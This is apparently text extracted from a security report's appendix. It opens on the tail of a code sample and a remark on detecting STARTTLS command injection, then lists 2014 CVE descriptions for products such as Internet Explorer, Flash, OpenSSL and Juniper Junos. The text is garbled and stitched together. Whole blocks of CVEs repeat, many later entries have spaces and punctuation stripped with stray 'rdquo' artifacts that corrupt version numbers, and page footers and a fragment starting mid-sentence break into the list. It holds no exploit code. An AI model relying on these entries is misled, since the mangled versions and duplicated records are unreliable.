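    return 0;
}
```

Because the injected commands are never visible inside the TLS stream, a transparent capture of the encrypted session will not show them; the trace to look for on the plaintext side is a STARTTLS line followed by further data in the same segment.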

CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.

CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.

CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.

CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.

CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.

CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4105: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability."

CVE-2014-4127: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4130: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4132 and CVE-2014-4138.

CVE-2014-4132: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4130 and CVE-2014-4138.

CVE-2014-4133: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4137.

CVE-2014-4141: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4481: Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.

CVE-2014-4617: The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.

CVE-2014-4631: RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.

CVE-2014-5528: The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2014-6040: GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.

CVE-2014-6105: IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.

CVE-2014-6136: IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-6164: IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies and consequently obtain sensitive information via a crafted URL.

CVE-2014-6363: vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability."

CVE-2014-6369: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-6378: Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.

CVE-2014-6487: Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.

CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets

CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code

CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c

CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows

and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158

CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site

CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo

CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460

CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014

CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo

CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 26 of 28

Survey Responses



MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.

CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.

CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability".

CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability".

CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability".

CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-0321.

CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.

CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.

CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.

CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.

CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.

CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.

CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.

CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.

CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.

CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.

CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)".

CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion", a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.

CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.

CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.

CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.

CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.

CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.

CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.

CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.

CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.

CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.

CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.

CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.

CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.

CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.

CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.

CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.

CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability".

CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability".

CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability".

CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability".

CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.

CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.

CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.

CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.

CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.

CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.

CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.

CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.

CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2773.

CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.

CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2788.

CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.

CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.

CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.

CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.

CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.

CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.

CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.

CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.

CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.

CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.

CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4105: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability".

CVE-2014-4127: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".


CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460

CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014

CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo

